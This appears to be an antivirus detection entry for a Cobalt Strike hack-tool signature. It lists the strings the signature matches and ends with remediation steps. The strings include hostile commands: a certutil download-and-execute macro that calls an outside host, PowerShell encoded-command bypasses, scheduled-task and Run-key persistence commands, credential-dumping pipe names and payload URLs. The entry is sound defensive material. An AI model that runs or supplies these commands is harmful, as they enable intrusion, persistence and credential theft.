Concrete signature match: Hack Tool - Tool used to exploit vulnerabilities for 32-bit Windows platform, family CobaltStrike
This is a concrete detection of HackTool:Win32/CobaltStrike!pz, indicating the presence of the Cobalt Strike post-exploitation framework on the system. This sophisticated threat is used by malicious actors for establishing persistence (e.g., via scheduled tasks like 'Tencentid'), bypassing UAC, keylogging, network reconnaissance, PowerShell execution, and communicating with a command-and-control server using named pipes and HTTP requests.
Relevant strings associated with this threat:
- \cobaltstrike 3.14\payload\AvByPass (PEHSTR_EXT)
- S/F /Create /TN Tencentid /sc minute /MO 1 /TR C:\Users\Public\Music\tencentsoso.exe (PEHSTR)
- C:\Users\Public\Music\cia.plan (PEHSTR)
- !C:\Users\Public\Music\SideBar.dll (PEHSTR)
- artifact64big.dll (PEHSTR_EXT)
- artifact32big.dll (PEHSTR_EXT)
- K[ZKK\OKM (PEHSTR_EXT)
- GetCommandLineA (PEHSTR_EXT)
- GetCommandLineW (PEHSTR_EXT)
- \\.\pipe\MSSE-1966-server (PEHSTR_EXT)
- temp.dll (PEHSTR_EXT)
- ././., (PEHSTR_EXT)
- .,./., (PEHSTR_EXT)
- /posts/ (PEHSTR_EXT)
- /ivc/ (PEHSTR_EXT)
- /k&>}2 (SNID)
- QJM#/I (SNID)
- vN.6b (SNID)
- Microsoft Base Cryptographic Provider v1.0 (PEHSTR_EXT)
- HttpAddRequestHeadersA (PEHSTR_EXT)
- beacon.dll (PEHSTR_EXT)
- .dll (PEHSTR_EXT)
- \\.\pipe\bypassuac (PEHSTR_EXT)
- \\.\pipe\keylogger (PEHSTR_EXT)
- /send%s (PEHSTR_EXT)
- rcap:// (PEHSTR_EXT)
- \\.\pipe\netview (PEHSTR_EXT)
- \\.\pipe\powershell (PEHSTR_EXT)
- \\.\pipe\screenshot (PEHSTR_EXT)
- \\.\pipe\elevate (PEHSTR_EXT)
- \\.\pipe\hashdump (PEHSTR_EXT)
- Global\SAM (PEHSTR_EXT)
- \\.\pipe\portscan (PEHSTR_EXT)
- \\%s\ipc$ (PEHSTR_EXT)
- \\.\pipe\sshagent (PEHSTR_EXT)
- COBALTSTRIKE (PEHSTR_EXT)
- %1024[^ ] %8[^:]://%1016[^/]%7168 (PEHSTR_EXT)
- \\%s\pipe\msagent_%x (PEHSTR_EXT)
- [command] (PEHSTR_EXT)
- \\.\pipe\mimikatz (PEHSTR_EXT)
- test.dll (PEHSTR_EXT)
- shellcodeexecute (PEHSTR_EXT)
- Application.ShellExecute "cmd.exe", "/c certutil -urlcache -split -f https://docs.healthmade.org//tc.js ""%USERPROFILE%\\Documents\\tc.js"" && cscript ""%USERPROFILE%\\Documents\\tc.js"" && del ""%USERPROFILE%\\Documents\\tc.js"" ", "C:\Windows\System32" (MACROHSTR_EXT)
- CWEMRvwtJNovrrWsIwERjSjD (PEHSTR_EXT)
- AS\e\%r (SNID)
- could not run command (w/ token) because of its length of %d bytes! (PEHSTR_EXT)
- powershell -nop -exec bypass -EncodedCommand "%s" (PEHSTR_EXT)
- spawn::decrypting... (PEHSTR)
- \regedit.exe (PEHSTR)
- tps://122.228.7.225/admin?file= (PEHSTR_EXT)
- 122.193.130.74 (PEHSTR_EXT)
- 121.207.229.145 (PEHSTR_EXT)
- File Download Success. (PEHSTR_EXT)
- download.exe (PEHSTR_EXT)
- /checker (PEHSTR_EXT)
- YG@JG\ (PEHSTR_EXT)
- |ZB{]K\zF\KOJ}ZO\Z (PEHSTR_EXT)
- HTTP/1.1 200 OK (PEHSTR_EXT)
- %02d/%02d/%02d %02d:%02d:%02d (PEHSTR_EXT)
- CFy92ROzKls\ro\HwtAF.pdb (PEHSTR_EXT)
- r8BsHuPe56l\ilYp\i12tW5S7m3 (PEHSTR_EXT)
- /C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v (PEHSTR_EXT)
- /t REG_SZ /d "Rundll32.exe SHELL32.DLL,ShellExec_ (PEHSTR_EXT)
- 7I.S_T (SNID)
- \>~gZ (SNID)
- shellcodeloading/checkSandbox.timeSleep (PEHSTR_EXT)
- shellcodeloading/checkSandbox.physicalMemory (PEHSTR_EXT)
- shellcodeloading/checkSandbox.numberOfCPU (PEHSTR_EXT)
- sync.(*Mutex).Lock (PEHSTR_EXT)
- crypto/cipher.xorBytes (PEHSTR_EXT)
- shellcodeloading/aes.AesDecrypt (PEHSTR_EXT)
- runtime.injectglist (PEHSTR_EXT)
- sync.(*Mutex).lockSlow (PEHSTR_EXT)
- sync.(*entry).load (PEHSTR_EXT)
- shellcodeloading/checkSandbox.CheckSandbox (PEHSTR_EXT)
- crypto/cipher.NewCBCDecrypter (PEHSTR_EXT)
- crypto/cipher.xorBytesSSE2 (PEHSTR_EXT)
- crypto/aes.decryptBlockGo (PEHSTR_EXT)
- 0.bin (PEHSTR_EXT)
- \Bypass_AV.pdb (PEHSTR_EXT)
- Bypass_AV.pdb (PEHSTR_EXT)
- InternetReadFile(...) (PEHSTR_EXT)
- HttpSendRequestA(...) (PEHSTR_EXT)
- /htEp (PEHSTR_EXT)
- oshi.at (PEHSTR_EXT)
- UserInitMprLogonScript (PEHSTR_EXT)
- %s as %s\%s: %d (PEHSTR_EXT)
- beacon.x64.dll (PEHSTR_EXT)
- Updater.dll (PEHSTR_EXT)
- Content-Type: application/octet-stream (PEHSTR_EXT)
- cmd /c C:\Windows\Temp (PEHSTR_EXT)
- DllGetClassObject (PEHSTR_EXT)
- DllRegisterServer (PEHSTR_EXT)
- \SLN\HRM_SUB\ (PEHSTR_EXT)
- \HRM_SUB.pdb (PEHSTR_EXT)
- AVBypass.pdb (PEHSTR_EXT)
- http_dll.dat (PEHSTR_EXT)
- //rs.qbox.me/chtype/ (PEHSTR_EXT)
- Dbak/chdb:qiniu.png (PEHSTR_EXT)
- 252.72.131.228 (PEHSTR_EXT)
- 240.232.200.0 (PEHSTR_EXT)
- 0.0.65.81 (PEHSTR_EXT)
- 65.80.82.81 (PEHSTR_EXT)
- 86.72.49.210 (PEHSTR_EXT)
- 101.72.139.82 (PEHSTR_EXT)
- set_UseShellExecute (PEHSTR_EXT)
- Aborting... (PEHSTR_EXT)
- -sta -noprofile -executionpolicy bypass -encodedcommand (PEHSTR_EXT)
- Press any key... (PEHSTR_EXT)
- http://144.48.240.85/18.exe (PEHSTR_EXT)
- 4Bejz8txQ/rDnf (PEHSTR_EXT)
- ShellCodeLoader\bin (PEHSTR_EXT)
- http://49.234.65.52/UpdateStream_x86.cab (PEHSTR_EXT)
- HttpWebRequest (PEHSTR_EXT)
- \x91\xe1\xa19 (PEHSTR_EXT)
- \xE9\xE8\Xa1 (PEHSTR_EXT)
- 0ZNA3EZ4g.exe (PEHSTR_EXT)
- 0ZNA3EZ4g.xlsx (PEHSTR_EXT)
- legacy.chunk.js (PEHSTR_EXT)
- windows\temp\ (PEHSTR_EXT)
- .exe (PEHSTR_EXT)
- getparagraphopendllpathforbinaryas1put1bclose1 (MACROHSTR_EXT)
- namefnzstasstatbase64decodexe1py3jvc29mdfxuzwftc1xjdxjyzw50etdsendifend (MACROHSTR_EXT)
- windows.ini (PEHSTR)
- mgur730yw1.dll (PEHSTR_EXT)
- \Parallel_Asis.dll (PEHSTR_EXT)
- mscorsvc.dll (PEHSTR_EXT)
- 1.dll (PEHSTR_EXT)
- Loader.nim (PEHSTR_EXT)
- bcmode.nim (PEHSTR_EXT)
- Test.dll (PEHSTR_EXT)
- \.\PhysicalDrive0 (PEHSTR_EXT)
- temp\packed64-temp.pdb (PEHSTR_EXT)
- \projects\garda\storage\targets\work6.x2.pdb (PEHSTR_EXT)
- .sedata (PEHSTR_EXT)
- .gehc (PEHSTR_EXT)
- Release\movenpeak.pdb (PEHSTR_EXT)
- System.Web.ni.dll (PEHSTR_EXT)
- 0cobaltstrike-chtsec (PEHSTR_EXT)
- DetectAttack.dll (PEHSTR_EXT)
- x64\Debug\DetectAttack.pdb (PEHSTR_EXT)
- powershell -nop -exec bypass -EncodedCommand (PEHSTR_EXT)
- nfvurg856lk63.dll (PEHSTR_EXT)
- programdata\3bef479.tmp (PEHSTR_EXT)
- Release\SetupEngine.pdb (PEHSTR_EXT)
- Applebaidugooglebingcsdnbokeyuanhelloworld.com (PEHSTR_EXT)
- ;\$ r (PEHSTR_EXT)
- DllMain (PEHSTR_EXT)
- PolicyPlus.Resources.resources (PEHSTR_EXT)
- %c%c%c%c%c%c%c%c%cnetsvc\ (PEHSTR_EXT)
- enhanced-google.com (PEHSTR_EXT)
- Control_RunDLL "C:\ProgramData\AxlnstSV\xlsrd.cpl (PEHSTR_EXT)
- E2/L9L$@ (PEHSTR_EXT)
- CymulateStagelessMeterpreterDll.dll (PEHSTR_EXT)
- \Cymulate\Agent\AttacksLogs\edr (PEHSTR_EXT)
- QlZylT5WMZcGIAyTUbSGnAerR.resources (PEHSTR_EXT)
- New Project 2.exe (PEHSTR_EXT)
- raw.githubusercontent.com/kk-echo123/aoisndoi/ (PEHSTR_EXT)
- .retplne (PEHSTR_EXT)
- wsc_UUIDS.dll (PEHSTR_EXT)
- D:\project\doge-cloud\targetfiles (PEHSTR_EXT)
- on_avast_dll_unload (PEHSTR_EXT)
- peloader\peloader_64\ (PEHSTR_EXT)
- \Release\peloader (PEHSTR_EXT)
- AtomLdr.dll (PEHSTR_EXT)
- A7d8Gw8XN////76uvq+trqm3zi2at3Stn7d0ree3dK3ft3SNr7fwSLW1ss42t84/U (PEHSTR_EXT)
- RunScript (PEHSTR_EXT)
- PoolAndSpaDepot.My.Resources (PEHSTR_EXT)
- test1\source\repos\download\x64\Release\download.pdb (PEHSTR_EXT)
- WindowsProject_bin.dll (PEHSTR)
- jsporvjlfsqmlsamxdrvitxha (PEHSTR_EXT)
- api.gogleapi.click/file/System/ (PEHSTR_EXT)
- Projects\evasionC_go\workingSpace (PEHSTR_EXT)
- _seh_filter_dll (PEHSTR_EXT)
- \Shellcode\ReflectiveLoader.pdb (PEHSTR_EXT)
- /|bD;X (SNID)
- MACOSX\pdf.pdf (PEHSTR_EXT)
- sync.(*RHe0UcdpHEv).RUnlock (PEHSTR_EXT)
- nX0mgbuOjw.(*wU6_Xfv4).bqwSOvr5m (PEHSTR_EXT)
- yCcdI7eVq.(*UE5TRl).xKFXpU5Cyab (PEHSTR_EXT)
- PT2MtVR9gr5.go (PEHSTR_EXT)
- CallDLLDynamic.pdb (PEHSTR_EXT)
- per_thread_data.cpp (PEHSTR_EXT)
- [*] Executing (PEHSTR_EXT)
- ConsoleApp1.exe (PEHSTR_EXT)
- n/q9) (SNID)
- krpt_RemoveDllFilterProtectDetour (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForSoftwarePacking.C!pli (PEHSTR_EXT)647085fbac65f6c32b259d8afa83cbfc68b6b8bc6f6e1e01af21e1bf99edbfeaImmediately isolate the affected system from the network. Remove all detected malicious files and persistence mechanisms, such as the scheduled task 'Tencentid' and associated executables like 'tencentsoso.exe'. Conduct a thorough forensic investigation to determine the extent of compromise, reset all user and service account credentials, and consider re-imaging the system to ensure complete eradication.